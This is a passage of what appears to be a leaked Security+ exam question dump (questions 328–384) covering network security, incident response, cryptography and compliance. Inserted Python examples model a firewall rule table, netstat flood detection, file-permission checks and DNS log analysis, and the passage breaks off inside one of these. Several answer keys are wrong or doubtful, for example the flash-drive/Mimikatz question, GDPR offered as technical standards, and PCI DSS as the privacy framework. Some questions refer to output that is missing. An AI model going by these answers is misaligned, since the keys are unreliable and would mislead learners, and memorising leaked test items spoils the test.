for a laboratory. The laboratory has decided to interconnect with partner laboratories to make
data transfers easier and more secure. The Chief Security Officer (CSO) has several concerns
about proprietary data being exposed once the interconnections are established. Which of the
following security features should the network administrator implement to prevent unwanted data
exposure to users in partner laboratories?
A. VLAN zoning with a file-transfer server in an external-facing zone
B. DLP running on hosts to prevent file transfers between networks
C. NAC that permits only data-transfer agents to move data between networks
D. VPN with full tunneling and NAS authenticating through the Active Directory
Answer: A
QUESTION 328
An external forensics investigator has been hired to investigate a data breach at a large enterprise
with numerous assets. It is known that the breach started in the DMZ and moved to the sensitive
information, generating multiple logs as the attacker traversed the network.
Which of the following will BEST assist with this investigation?
A. Perform a vulnerability scan to identify the weak spots.
B. Use a packet analyzer to investigate the NetFlow traffic.
C. Check the SIEM to review the correlated logs.
D. Require access to the routers to view current sessions.
Answer: C
QUESTION 329
The human resources department of a large online retailer has received multiple customer
complaints about the rudeness of the automated chatbots it uses to interface with and assist online
shoppers. The system, which continuously learns and adapts, was working fine when it was
installed a few months ago. Which of the following BEST describes the method being used to
exploit the system?
A. Baseline modification
B. A fileless virus
C. Tainted training data
D. Cryptographic manipulation
Answer: C
QUESTION 330
Joe, a security analyst, recently performed a network discovery to fully understand his
organization's electronic footprint from a "public" perspective. Joe ran a set of commands and
received the following output:
Which of the following can be determined about the organization's public presence and security
posture? (Choose two.)
A. Joe used Whois to produce this output.
B. Joe used cURL to produce this output.
C. Joe used Wireshark to produce this output.
D. The organization has adequate information available in public registration.
E. The organization has too much information available in public registration.
F. The organization has too little information available in public registration.
Answer: AD
QUESTION 331
A systems administrator needs to install a new wireless network for authenticated guest access.
The wireless network should support 802.1X using the most secure encryption and protocol
available.
Perform the following steps:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest.
The guest AD credentials are:
User: guest01
Password: guestpass
Answer:
WiFi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10
RADIUS Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20
Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
QUESTION 332
Hotspot Question
The security administration has installed a new firewall which implements an implicit DENY policy
by default.
INSTRUCTIONS
Click on the firewall and configure it to allow ONLY the following communication:
The Accounting workstation can ONLY access the web server on the public network over the
default HTTPS port. The accounting workstation should not access other networks.
The HR workstation should be restricted to communicate with the Financial server ONLY, over
the default SCP port.
The Admin workstation should ONLY be able to access the servers on the secure network over
the default TFTP port.
The firewall will process the rules in a top-down manner in order as a first match. The port
number must be typed in and only one port number can be entered per rule. Type ANY for all
ports.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
Explanation:
Implicit deny is the default security stance: if you are not specifically granted access or
privileges for a resource, you are denied access by default.
Rule #1 allows the Accounting workstation to ONLY access the web server on the public network
over the default HTTPS port, which is TCP port 443.
Rule #2 allows the HR workstation to ONLY communicate with the Financial server over the
default SCP port, which is TCP port 22.
Rule #3 & Rule #4 allow the Admin workstation to ONLY access the Financial and Purchasing
servers located on the secure network over the default TFTP port, which is UDP port 69.
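The rule set above, modelled as a first-match table with an implicit deny. This is an added example, not part of the exam or of the Lead2pass material; every address is a constructed placeholder (the simulation gives no host addresses), and the shadowing check goes beyond the question to show why rule order matters in a first-match firewall.

```python
# Added example, not from the exam: a first-match firewall rule table with
# an implicit deny, modelling the four rules from the explanation above.
# All addresses are constructed placeholders (RFC 1918 for internal hosts,
# TEST-NET-3 for the public web server); the simulation does not give any.
from dataclasses import dataclass
from typing import List, Optional, Tuple

ACCOUNTING_WS = "10.0.1.10"
HR_WS = "10.0.1.20"
ADMIN_WS = "10.0.1.30"
PUBLIC_WEB = "203.0.113.10"
FINANCIAL_SRV = "10.0.2.10"
PURCHASING_SRV = "10.0.2.20"


@dataclass(frozen=True)
class Rule:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "any"
    port: Optional[int]   # destination port; None stands for ANY
    action: str           # "allow" or "deny"

    def matches(self, src: str, dst: str, proto: str, port: int) -> bool:
        return (self.src == src and self.dst == dst
                and self.proto in ("any", proto)
                and self.port in (None, port))


# Rule 1: accounting -> public web server, HTTPS (TCP 443)
# Rule 2: HR -> financial server, SCP (TCP 22)
# Rules 3 and 4: admin -> both secure-network servers, TFTP (UDP 69)
RULES: List[Rule] = [
    Rule(ACCOUNTING_WS, PUBLIC_WEB, "tcp", 443, "allow"),
    Rule(HR_WS, FINANCIAL_SRV, "tcp", 22, "allow"),
    Rule(ADMIN_WS, FINANCIAL_SRV, "udp", 69, "allow"),
    Rule(ADMIN_WS, PURCHASING_SRV, "udp", 69, "allow"),
]


def evaluate(rules: List[Rule], src: str, dst: str, proto: str,
             port: int) -> Tuple[str, Optional[int]]:
    """Walk the table top-down; the first matching rule decides.
    No match at all is the implicit deny, reported with rule number None."""
    for number, rule in enumerate(rules, start=1):
        if rule.matches(src, dst, proto, port):
            return rule.action, number
    return "deny", None


def shadowed_rules(rules: List[Rule]) -> List[int]:
    """Rule numbers that can never fire because an earlier rule already
    matches every packet they would match (a common first-match mistake)."""
    shadowed = []
    for j, later in enumerate(rules):
        for earlier in rules[:j]:
            same_hosts = earlier.src == later.src and earlier.dst == later.dst
            proto_cover = earlier.proto == "any" or earlier.proto == later.proto
            port_cover = earlier.port is None or earlier.port == later.port
            if same_hosts and proto_cover and port_cover:
                shadowed.append(j + 1)
                break
    return shadowed


if __name__ == "__main__":
    print(evaluate(RULES, ACCOUNTING_WS, PUBLIC_WEB, "tcp", 443))     # ('allow', 1)
    print(evaluate(RULES, ACCOUNTING_WS, FINANCIAL_SRV, "tcp", 443))  # ('deny', None)
    print(shadowed_rules(RULES))                                      # []
```

Because the Accounting workstation has no rule other than #1, every other destination falls through to the implicit deny, which is exactly what "should not access other networks" requires; a broad rule placed above #2 would silently shadow it, which `shadowed_rules` reports.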
QUESTION 333
An organization's corporate offices were destroyed due to a natural disaster, so the organization
is now setting up offices in a temporary work space. Which of the following will the organization
MOST likely consult?
A. The business continuity plan
B. The disaster recovery plan
C. The communications plan
D. The incident response plan
Answer: B
Explanation:
Disaster recovery is preparing to recover IT operations after a disaster has occurred.
Business continuity is ensuring that IT operations keep working DURING a disaster.
QUESTION 334
An organization recently recovered from a data breach. During the root cause analysis, the
organization determined the source of the breach to be a personal cell phone that had been
reported lost. Which of the following solutions should the organization implement to reduce the
likelihood of future data breaches?
A. MDM
B. MAM
C. VDI
D. DLP
Answer: A
QUESTION 335
An organization relies on third-party video conferencing to conduct daily business. Recent
security changes now require all remote workers to utilize a VPN to corporate resources.
Which of the following would BEST maintain high-quality video conferencing while minimizing
latency when connected to the VPN?
A. Using geographic diversity to have VPN terminators closer to end users
B. Utilizing split tunneling so only traffic for corporate resources is encrypted
C. Purchasing higher-bandwidth connections to meet the increased demand
D. Configuring QoS properly on the VPN accelerators
Answer: D
QUESTION 336
A company just developed a new web application for a government agency. The application must
be assessed and authorized prior to being deployed. Which of the following is required to assess
the vulnerabilities resident in the application?
A. Repository transaction logs
B. Common Vulnerabilities and Exposures
C. Static code analysis
D. Non-credentialed scans
Answer: C
QUESTION 337
A user must introduce a password and a USB key to authenticate against a secure computer, and
authentication is limited to the state in which the company resides. Which of the following
authentication concepts are in use?
A. Something you know, something you have, and somewhere you are
B. Something you know, something you can do, and somewhere you are
C. Something you are, something you know, and something you can exhibit
D. Something you have, somewhere you are, and someone you know
Answer: A
QUESTION 338
A bank detects fraudulent activity on a user's account. The user confirms transactions completed
yesterday on the bank's website at https://www.company.com. A security analyst then examines
the user's Internet usage logs and observes the following output:
Which of the following has MOST likely occurred?
A. Replay attack
B. SQL injection
C. SSL stripping
D. Race conditions
Answer: A
QUESTION 339
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the
remote systems. Several users also reported that the new company flash drives they picked up in
the break room only have 512KB of storage. Which of the following is MOST likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and
restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash
drives are not on the application's allow list, temporarily restricting the drives to 512KB of
storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to
use an unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is
attempting to harvest plaintext credentials from memory.
Answer: B
QUESTION 340
A security analyst is reviewing a penetration-testing report from a third-party contractor. The
penetration testers used the organization's new API to bypass a driver to perform privilege
escalation on the organization's web servers. Upon looking at the API, the security analyst
realizes the particular API call was to a legacy system running an outdated OS.
Which of the following is the MOST likely attack type?
A. Request forgery
B. Session replay
C. DLL injection
D. Shimming
Answer: D
Explanation:
When an application attempts to call an older driver, the operating system intercepts the call and
redirects it to run the shim code instead.
QUESTION 341
Which of the following utilize a subset of real data and are MOST likely to be used to assess the
features and functions of a system and how it interacts or performs from an end user's
perspective against defined test cases? (Choose two.)
A. Production
B. Test
C. Research and development
D. PoC
E. UAT
F. SDLC
Answer: BE
QUESTION 342
A network administrator is concerned about users being exposed to malicious content when
accessing company cloud applications. The administrator wants to be able to block access to
sites based on the AUP. The users must also be protected because many of them work from
home or at remote locations, providing on-site customer support.
Which of the following should the administrator employ to meet these criteria?
A. Implement NAC.
B. Implement an SWG.
C. Implement a URL filter.
D. Implement an MDM.
Answer: B
Explanation:
A secure web gateway (SWG) protects users from web-based threats in addition to applying and
enforcing corporate acceptable use policies.
QUESTION 343
An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in
Europe. To which of the following frameworks should the security officer map the existing
controls? (Choose two.)
A. ISO
B. PCI DSS
C. SOC
D. GDPR
E. CSA
F. NIST
Answer: BD
QUESTION 344
Several large orders of merchandise were recently purchased on an e-commerce company's
website. The totals for each of the transactions were negative values, resulting in credits on the
customers' accounts. Which of the following should be implemented to prevent similar situations
in the future?
A. Ensure input validation is in place to prevent the use of invalid characters and values.
B. Calculate all possible values to be added together and ensure the use of the proper integer in
the code.
C. Configure the web application firewall to look for and block session replay attacks.
D. Make sure transactions that are submitted within very short time periods are prevented from
being processed.
Answer: A
QUESTION 345
To mitigate the impact of a single VM being compromised by another VM on the same hypervisor,
an administrator would like to utilize a technical control to further segregate the traffic.
Which of the following solutions would BEST accomplish this objective?
A. Install a hypervisor firewall to filter east-west traffic.
B. Add more VLANs to the hypervisor network switches.
C. Move exposed or vulnerable VMs to the DMZ.
D. Implement a zero-trust policy and physically segregate the hypervisor servers.
Answer: A
QUESTION 346
A nationwide company is experiencing unauthorized logins at all hours of the day. The logins
appear to originate from countries in which the company has no employees.
Which of the following controls should the company consider using as part of its IAM strategy?
(Choose two.)
A. A complex password policy
B. Geolocation
C. An impossible travel policy
D. Self-service password reset
E. Geofencing
F. Time-based logins
Answer: EF
Explanation:
Time-based authentication is a special procedure to prove an individual's identity and authenticity
simply by detecting their presence at a scheduled time of day, or within a scheduled time interval,
at a distinct location.
Geofencing, as the name suggests, lets IT administrators restrict the usage of corporate devices
to certain regions, such as office premises. This is done by creating virtual fences, called
geofences, based on real-world geographical regions. Geofencing is ideally used in enterprises
with stringent compliance standards that require corporate devices containing sensitive data to
remain within the organization's premises at all times. MDM lets you define security policies
based on the virtual perimeter created as a geofence, ensuring there is no unauthorized
corporate data access.
QUESTION 347
An organization has expanded its operations by opening a remote office. The new office is fully
furnished with office resources to support up to 50 employees working on any given day.
Which of the following VPN solutions would BEST support the new office?
A. Always On
B. Remote access
C. Site-to-site
D. Full tunnel
Answer: C
Explanation:
Site-to-site VPN provides secure connectivity between two or more geographically dispersed
locations, such as a main office and a remote office. It is a good choice when multiple users need
to access network resources from the remote office, as it allows all the users in the remote office
to securely connect to the main office network using a single VPN connection. This solution
provides a secure, encrypted tunnel between the two sites, allowing traffic to flow securely
between them.
QUESTION 348
A security analyst has been reading about a newly discovered cyber attack from a known threat
actor. Which of the following would BEST support the analyst's review of the tactics, techniques,
and protocols the threat actor was observed using in previous campaigns?
A. Security research publications
B. The MITRE ATT&CK framework
C. The Diamond Model of Intrusion Analysis
D. The Cyber Kill Chain
Answer: B
Explanation:
The MITRE ATT&CK Framework was created by MITRE in 2013 to document attacker tactics
and techniques based on real-world observations. This index continues to evolve with the threat
landscape and has become a renowned knowledge base for the industry to understand attacker
models, methodologies, and mitigation.
QUESTION 349
Which of the following is the correct order of volatility from MOST to LEAST volatile?
A. Memory, temporary filesystems, routing tables, disk, network storage
B. Cache, memory, temporary filesystems, disk, archival media
C. Memory, disk, temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media
Answer: B
QUESTION 350
After installing a Windows server, a cybersecurity administrator needs to harden it, following
security best practices. Which of the following will achieve the administrator's goal? (Choose
two.)
A. Disabling guest accounts
B. Disabling service accounts
C. Enabling network sharing
D. Disabling NetBIOS over TCP/IP
E. Storing LAN manager hash values
F. Enabling NTLM
Answer: AD
QUESTION 351
A company deployed a WiFi access point in a public area and wants to harden the configuration
to make it more secure. After performing an assessment, an analyst identifies that the access
point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the
analyst disable to enhance the access point security?
A. WPA3
B. AES
C. RADIUS
D. WPS
Answer: D
Explanation:
Wi-Fi Protected Setup (WPS): even though WPS offers convenience, it is appallingly insecure.
Wireless networks with WPS enabled are highly vulnerable to cybersecurity threats, because
attackers can target the WPS function to steal the network password, regardless of how complex
that password is.
QUESTION 352
Which of the following distributes data among nodes, making it more difficult to manipulate the
data while also minimizing downtime?
A. MSSP
B. Public cloud
C. Hybrid cloud
D. Fog computing
Answer: D
Explanation:
Fog computing uses multiple nodes, while edge computing uses a single node.
QUESTION 353
A SOC is implementing an insider threat detection program. The primary concern is that users may
be accessing confidential data without authorization. Which of the following should be deployed to
detect a potential insider threat?
A. A honeyfile
B. A DMZ
C. UTM
D. File integrity monitoring
Answer: A
QUESTION 354
A security assessment found that several embedded systems are running unsecure protocols.
These Systems were purchased two years ago and the company that developed them is no
longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?
A. Inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Answer: D
QUESTION 355
A security analyst needs to find real-time data on the latest malware and IoCs. Which of the
following BEST describes the solution the analyst should pursue?
A. Advisories and bulletins
B. Threat feeds
C. Security news articles
D. Peer-reviewed content
Answer: B
QUESTION 356
A web server has been compromised due to a ransomware attack. Further investigation reveals
the ransomware has been in the server for the past 72 hours. The systems administrator needs to
get the services back up as soon as possible. Which of the following should the administrator use
to restore services to a secure state?
A. The last incremental backup that was conducted 72 hours ago
B. The last known-good configuration
C. The last full backup that was conducted seven days ago
D. The baseline OS configuration
Answer: C
Explanation:
Ransomware will most likely render the web server unusable, and the server must be isolated for
forensic investigation. This leaves only the option of starting a new web server from scratch and
restoring the last full backup, plus any differential or incremental backups that are certain to be
clean of ransomware (if available).
QUESTION 357
Which of the following would cause a Chief Information Security Officer (CISO) the MOST
concern regarding newly installed Internet-accessible 4K surveillance cameras?
A. An inability to monitor 100% of every facility could expose the company to unnecessary risk.
B. The cameras could be compromised if not patched in a timely manner.
C. Physical security at the facility may not protect the cameras from theft.
D. Exported videos may take up excessive space on the file servers.
Answer: A
QUESTION 358
A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider
from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds. Which of the following cryptographic
techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Answer: C
Explanation:
Homomorphic encryption is a form of encryption that permits users to perform computations on
encrypted data without first decrypting it.
QUESTION 359
A major political party experienced a server breach. The hacker then publicly posted stolen
internal communications concerning campaign strategies to give the opposition party an
advantage. Which of the following BEST describes these threat actors?
A. Semi-authorized hackers
B. State actors
C. Script kiddies
D. Advanced persistent threats
Answer: B
Explanation:
State actor - A type of threat actor that is supported by the resources of its host country's military
and security services.
QUESTION 360
Which of the following often operates in a client-server architecture to act as a service repository,
providing enterprise consumers access to structured threat intelligence data?
A. STIX
B. CIRT
C. OSINT
D. TAXII
Answer: A
Explanation:
STIX acts as the service repository (which is what the question asks about), providing enterprise
consumers access to structured threat intelligence data; TAXII is the vector, or transport, for STIX
data.
QUESTION 361
A security analyst is reviewing the following output from a system:
Which of the following is MOST likely being observed?
A. ARP poisoning
B. Man in the middle
C. Denial of service
D. DNS poisoning
Answer: C
Explanation:
Once you realize the destination IP and port are on the left, the answer is easier to understand.
Multiple source ports trying to connect to the same destination IP and port means a DoS.
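The pattern described in the explanation, turned into a check over netstat-style output. This is an added example, not part of the exam: the listing is constructed (the question's real output is not on the page), with the local, or destination, socket on the left as in the question, and the threshold of five distinct source sockets is an arbitrary illustration value.

```python
# Added example, not from the exam: flag a possible DoS pattern in
# netstat-style output, where many distinct source sockets pile onto one
# destination IP:port. The listing below is constructed for illustration.
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SAMPLE_NETSTAT = """\
Proto  Local Address         Foreign Address         State
tcp    192.168.1.10:443      198.51.100.5:51001      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51002      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51003      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51004      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51005      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51006      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51007      SYN_RECV
tcp    192.168.1.10:443      198.51.100.5:51008      SYN_RECV
tcp    192.168.1.10:22       203.0.113.7:40100       ESTABLISHED
"""

# proto, local ip:port, foreign ip:port, state (header line does not match)
LINE_RE = re.compile(r"^(tcp|udp)6?\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def parse_netstat(text: str) -> List[Tuple[str, str, int, str, int, str]]:
    """Return (proto, local_ip, local_port, remote_ip, remote_port, state) per connection."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2), int(m.group(3)),
                         m.group(4), int(m.group(5)), m.group(6)))
    return rows


def find_flooded_sockets(text: str, threshold: int = 5) -> List[Dict]:
    """Group connections by local (destination) socket and report the ones
    hit from at least `threshold` distinct source sockets, noting how many
    are still half-open (SYN received, handshake never completed)."""
    peers = defaultdict(set)
    half_open = defaultdict(int)
    for _proto, lip, lport, rip, rport, state in parse_netstat(text):
        key = (lip, lport)
        peers[key].add((rip, rport))
        if state in ("SYN_RECV", "SYN_RECEIVED"):
            half_open[key] += 1
    findings = []
    for (ip, port), sources in sorted(peers.items()):
        if len(sources) >= threshold:
            findings.append({
                "target": f"{ip}:{port}",
                "source_sockets": len(sources),
                "distinct_source_ips": len({rip for rip, _ in sources}),
                "half_open": half_open[(ip, port)],
            })
    return findings


if __name__ == "__main__":
    for finding in find_flooded_sockets(SAMPLE_NETSTAT):
        print(finding)
```

A high `half_open` count against a single target with one source IP is the classic SYN-flood shape; many distinct source IPs would point to a distributed variant, which is why the finding records both numbers.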
QUESTION 362
Which of the following would a European company interested in implementing a technical, hands-on set of security standards MOST likely choose?
A. GDPR
B. CIS controls
C. ISO 27001
D. ISO 37000
Answer: A
Explanation:
In the wake of technological developments and globalisation and the constitutionalisation of the
fundamental right to data protection in the EU, the General Data Protection Regulation (GDPR)
aims to harmonise the framework for the digital single market, put individuals in control of their
data and formulate a modern data protection governance.
QUESTION 363
A security researcher is attempting to gather data on the widespread use of a zero-day exploit.
Which of the following will the researcher MOST likely use to capture this data?
A. A DNS sinkhole
B. A honeypot
C. A vulnerability scan
D. CVSS
Answer: B
QUESTION 364
An engineer is setting up a VDI environment for a factory location, and the business wants to
deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment
directly. Which of the following should the engineer select to meet these requirements?
A. Laptops
B. Containers
C. Thin clients
D. Workstations
Answer: C
QUESTION 365
A security analyst is reviewing the following command-line output:
Which of the following is the analyst observing?
A. IGMP spoofing
B. URL redirection
C. MAC address cloning
D. DNS poisoning
Answer: C
QUESTION 366
While reviewing the wireless router, the systems administrator of a small business determines
someone is spoofing the MAC address of an authorized device. Given the table below:
Which of the following should be the administrator's NEXT step to detect if there is a rogue
system without impacting availability?
A. Conduct a ping sweep.
B. Physically check each system.
C. Deny Internet access to the "UNKNOWN" hostname.
D. Apply MAC filtering.
Answer: B
Explanation:
The question is whether the unknown hostname is a rogue system. A ping sweep will not help: it
will only show that the host is connected, which the administrator already knows. Denying access
to the Internet does not detect anything, and MAC filtering cannot prevent MAC spoofing, so
physically checking each system is what will clarify the unknown hostname.
QUESTION 367
Which of the following should a data owner require all personnel to sign to legally protect
intellectual property?
A. An NDA
B. An AUP
C. An ISA
D. An MOU
Answer: A
QUESTION 368
A security administrator needs to inspect in-transit files on the enterprise network to search for
PII, credit card data, and classification words. Which of the following would be the BEST to use?
A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution
Answer: D
QUESTION 369
A security analyst must determine if either SSH or Telnet is being used to log in to servers. Which
of the following should the analyst use?
A. logger
B. Metasploit
C. tcpdump
D. netstat
Answer: D
QUESTION 370
A security administrator is trying to determine whether a server is vulnerable to a range of
attacks. After using a tool, the administrator obtains the following output:
Which of the following attacks was successfully implemented based on the output?
A. Memory leak
B. Race conditions
C. SQL injection
D. Directory traversal
Answer: D
Explanation:
Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access
to restricted directories and files.
QUESTION 371
An organization's finance department is implementing a policy to protect against collusion. Which
of the following control types and corresponding procedures should the organization implement to
fulfill this policy's requirement? (Choose two.)
A. Corrective
B. Deterrent
C. Preventive
D. Mandatory vacations
E. Job rotation
F. Separation of duties
Answer: DE
QUESTION 372
A security analyst is investigating a vulnerability in which a default file permission was set
incorrectly. The company uses non-credentialed scanning for vulnerability management.
Which of the following tools can the analyst use to verify the permissions?
A. ssh
B. chmod
C. ls
D. setuid
E. nessus
F. nc
Answer: C
Explanation:
chmod is used to change permissions; a command such as "ls -l" shows them as rwx triplets
(read, write, execute) for the owner, the group, and everyone else.
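A worked check of what the explanation describes, added here and not part of the exam: it converts the mode string that `ls -l` prints into the octal value `chmod` takes, and walks a constructed listing to flag the loose defaults an analyst would verify. The file names and the listing are constructed placeholders; the setuid and sticky-bit handling goes beyond the question so the converter is correct for every character `ls` can print in the mode column.

```python
# Added example, not from the exam: parse `ls -l` mode strings into the
# octal value chmod uses and flag files whose permissions are too loose.
# The listing is constructed for illustration.
from typing import List, Tuple

SAMPLE_LS = """\
-rw-r--r-- 1 root root   1024 Jun  1 10:00 /etc/app/app.conf
-rw-rw-rw- 1 root root   2048 Jun  1 10:00 /etc/app/secrets.ini
-rwsr-xr-x 1 root root  51200 Jun  1 10:00 /usr/local/bin/helper
drwxrwxrwt 5 root root   4096 Jun  1 10:00 /var/app/tmp
"""


def mode_to_octal(mode: str) -> int:
    """'-rwsr-xr-x' -> 0o4755. Handles setuid/setgid ('s'/'S') and sticky ('t'/'T')."""
    if len(mode) != 10:
        raise ValueError(f"expected a 10-character mode string, got {mode!r}")
    value = 0
    for i, ch in enumerate(mode[1:]):      # skip the file-type column
        bit = 1 << (8 - i)                 # u=400/200/100, g=40/20/10, o=4/2/1
        if ch in "rwx":
            value |= bit
        elif ch in "sS":                   # special bit in the user or group exec slot
            value |= 0o4000 if i == 2 else 0o2000
            if ch == "s":                  # lowercase means exec is also set
                value |= bit
        elif ch in "tT":                   # sticky bit in the other exec slot
            value |= 0o1000
            if ch == "t":
                value |= bit
        elif ch != "-":
            raise ValueError(f"unexpected character {ch!r} in {mode!r}")
    return value


def parse_ls(text: str) -> List[Tuple[str, int, str]]:
    """Return (path, octal mode, type column) for each `ls -l` line."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 8)        # mode links owner group size mon day time name
        if len(parts) == 9 and len(parts[0]) == 10:
            entries.append((parts[8], mode_to_octal(parts[0]), parts[0][0]))
    return entries


def world_writable(text: str) -> List[str]:
    """Paths anyone can write to; sticky world-writable directories such as /tmp are expected."""
    return [path for path, mode, kind in parse_ls(text)
            if mode & 0o002 and not (kind == "d" and mode & 0o1000)]


def setuid_files(text: str) -> List[str]:
    """Regular files that run with their owner's privileges."""
    return [path for path, mode, kind in parse_ls(text) if mode & 0o4000 and kind == "-"]


if __name__ == "__main__":
    for path, mode, _kind in parse_ls(SAMPLE_LS):
        print(f"{mode:04o}  {path}")
    print("world-writable:", world_writable(SAMPLE_LS))
    print("setuid:", setuid_files(SAMPLE_LS))
```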
QUESTION 373
A Chief Security Officer (CSO) is concerned about the volume and integrity of sensitive
information that is exchanged between the organization and a third party through email. The CSO
is particularly concerned about an unauthorized party who is intercepting information that is in
transit between the two organizations. Which of the following would address the CSO's
concerns?
A. SPF
B. DMARC
C. SSL
D. DKIM
E. TLS
Answer: D
QUESTION 374
Which of the following BEST describes the MFA attribute that requires a callback on a predefined
landline?
A. Something you exhibit
B. Something you can do
C. Someone you know
D. Somewhere you are
Answer: B
Explanation:
Something you can do: The only reason you can call that landline is because you can see the
number at that time. No one else can.
QUESTION 375
A multinational organization that offers web-based services has datacenters that are located only
in the United States; however, a large number of its customers are in Australia, Europe, and
China. Payments for services are managed by a third party in the United Kingdom that
specializes in payment gateways. The management team is concerned the organization is not
compliant with privacy laws that cover some of its customers. Which of the following frameworks
should the management team follow?
A. Payment Card Industry Data Security Standard
B. Cloud Security Alliance Best Practices
C. ISO/IEC 27032 Cybersecurity Guidelines
D. General Data Protection Regulation
Answer: A
QUESTION 376
A remote user recently took a two-week vacation abroad and brought along a corporate-owned
laptop. Upon returning to work, the user has been unable to connect the laptop to the VPN.
Which of the following is the MOST likely reason for the user's inability to connect the laptop to
the VPN? (Choose two.)
A. Due to foreign travel, the user's laptop was isolated from the network.
B. The user's laptop was quarantined because it missed the latest patch update.
C. The VPN client was blacklisted.
D. The user's account was put on a legal hold.
E. The laptop is still configured to connect to an international mobile network operator.
F. The user is unable to authenticate because they are outside of the organization's mobile
geofencing configuration.
Answer: AB
QUESTION 377
The concept of connecting a user account across the systems of multiple enterprises is BEST
known as:
A. federation.
B. a remote access policy.
C. multifactor authentication.
D. single sign-on.
Answer: A
Explanation:
SSO allows users to use a single set of credentials to access multiple systems within a single
organization (a single domain), while federation allows users to access systems across multiple
organizations.
QUESTION 378
A Chief Executive Officer (CEO) is dissatisfied with the level of service from the company's new
service provider. The service provider is preventing the CEO from sending email from a work
account to a personal account. Which of the following types of service providers is being used?
A. Telecommunications service provider
B. Cloud service provider
C. Master managed service provider
D. Managed security service provider
Answer: D
Explanation:
DLP is one of the services an MSSP provides.
QUESTION 379
Entering a secure area requires passing through two doors, both of which require someone who
is already inside to initiate access. Which of the following types of physical security controls does
this describe?
A. Cameras
B. Faraday cage
C. Access control vestibule
D. Sensors
E. Guards
Answer: C
Explanation:
Security vestibules provide additional protection by adding a secured space. Vestibules are
secured spaces with two or more sets of doors and an office sign-in area.
QUESTION 380
The lessons-learned analysis from a recent incident reveals that an administrative office worker
received a call from someone claiming to be from technical support. The caller convinced the
office worker to visit a website, and then download and install a program masquerading as an
antivirus package. The program was actually a backdoor that an attacker could later use to
remotely control the worker's PC. Which of the following would be BEST to help prevent this type
of attack in the future?
A. Data loss prevention
B. Segmentation
C. Application whitelisting
D. Quarantine
Answer: C
Explanation:
Application whitelisting is aimed at preventing malicious programs from running on a network. It
monitors the operating system in real time to prevent any unauthorized files from executing.
QUESTION 381
A security administrator has noticed unusual activity occurring between different global instances
and workloads and needs to identify the source of the unusual traffic. Which of the following log
sources would be BEST to show the source of the unusual traffic?
A. HIDS
B. UEBA
C. CASB
D. VPC
Answer: C
QUESTION 382
A manufacturing company has several one-off legacy information systems that cannot be
migrated to a newer OS due to software compatibility issues. The OSs are still supported by the
vendor, but the industrial software is no longer supported. The Chief Information Security Officer
(CISO) has created a resiliency plan for these systems that will allow OS patches to be installed
in a non-production environment, while also creating backups of the systems for recovery.
Which of the following resiliency techniques will provide these capabilities?
A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups
Answer: D
Explanation:
Since they are still testing the OS patch on non-production devices, they need a backup for
their rollback plan. Hence, they need a full backup in case everything goes wrong right after
the OS patch.
QUESTION 383
Which of the following terms should be included in a contract to help a company monitor the
ongoing security maturity of a new vendor?
A. A right-to-audit clause allowing for annual security audits
B. Requirements for event logs to be kept for a minimum of 30 days
C. Integration of threat intelligence in the company's AV
D. A data-breach clause requiring disclosure of significant data loss
Answer: A
QUESTION 384
An incident, which is affecting dozens of systems, involves malware that reaches out to an
Internet service for rules and updates. The IP addresses for the Internet host appear to be
different in each case. The organization would like to determine a common IoC to support
response and recovery actions.
Which of the following sources of information would BEST support this solution?
A. Web log files
B. Browser cache
C. DNS query logs
D. Antivirus
Answer: C
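The pivot this question describes, as an added example that is not part of the exam: when each infected host contacts a different IP address, the DNS query log is where the shared indicator (the name they all resolved) shows up. The log format is a simplified, constructed imitation of a resolver query log, and the hosts and domain names are placeholders.

```python
# Added example, not from the exam: find the domain every infected host
# resolved, even though the IP each host then connected to was different.
# The hosts, names and the simplified query-log format are constructed.
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed, simplified query log: "<time> client <ip>#<port>: query: <name> IN <type>"
SAMPLE_DNS_LOG = """\
09:00:01 client 10.0.0.5#51234: query: www.example.com IN A
09:00:02 client 10.0.0.5#51235: query: updates.example-cdn.test IN A
09:00:03 client 10.0.0.6#40011: query: updates.example-cdn.test IN A
09:00:04 client 10.0.0.6#40012: query: mail.example.com IN MX
09:00:05 client 10.0.0.7#33001: query: updates.example-cdn.test IN A
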